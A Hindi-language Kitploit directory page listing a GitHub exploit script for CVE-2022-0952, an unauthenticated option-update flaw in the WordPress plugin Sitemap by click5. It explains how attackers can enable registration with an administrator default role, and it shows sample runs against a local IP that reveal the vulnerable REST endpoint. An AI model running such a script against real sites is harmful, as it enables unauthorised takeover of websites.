Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-0952 — Sitemap by click5 < 1.0.36 - बिना प्रमाणीकरण के मनमाने विकल्प अद्यतन | Kitploit
उपकरण/GitHubGitHub/randomrobbiebf/cve-2022-0952
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगगलत कॉन्फ़िगरेशन
GitHubrandomrobbiebf/cve-2022-0952

CVE-2022-0952

Sitemap by click5 < 1.0.36 - बिना प्रमाणीकरण के मनमाने विकल्प अद्यतन

रिपॉजिटरी देखें
5143 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-0952

Sitemap by click5 < 1.0.36 - अप्रमाणित मनमाना विकल्प अपडेट

विवरण

यह प्लगइन REST एंडपॉइंट के माध्यम से विकल्प अपडेट करते समय प्राधिकरण और CSRF जाँच नहीं करता, और यह सुनिश्चित नहीं करता कि अपडेट किया जाने वाला विकल्प प्लगइन का ही है। इसके परिणामस्वरूप, अप्रमाणित हमलावर ब्लॉग के मनमाने विकल्प बदल सकते हैं, जैसे कि users_can_register और default_role, जिससे वे एक नया प्रशासक खाता बना सकते हैं और ब्लॉग पर कब्जा कर सकते हैं।

उदाहरण: प्रशासक और पंजीकरण सक्षम करें

root@kitploit:~
$ python3 CVE-2022-0952.py -u http://192.168.1.131:5555
The plugin version is below 1.0.36.
The plugin version is 1.0.35
Vulnerability check: http://192.168.1.131:5555
Option set successfully: http://192.168.1.131:5555/wp-json/click5_sitemap/API/update_html_option_AJAX
You can now register a user as an admin user. Remember to run --fix yes after you have registered to prevent others exploiting the site.

उदाहरण: प्रशासक और पंजीकरण अक्षम करें

root@kitploit:~
$ python3 CVE-2022-0952.py -u http://192.168.1.131:5555 --fix yes
Vulnerability check: http://192.168.1.131:5555
Option set successfully: http://192.168.1.131:5555/wp-json/click5_sitemap/API/update_html_option_AJAX
Fixed: You can not longer register
Option set successfully: http://192.168.1.131:5555/wp-json/click5_sitemap/API/update_html_option_AJAX
Fixed: You can not longer register
टूल डाउनलोड करें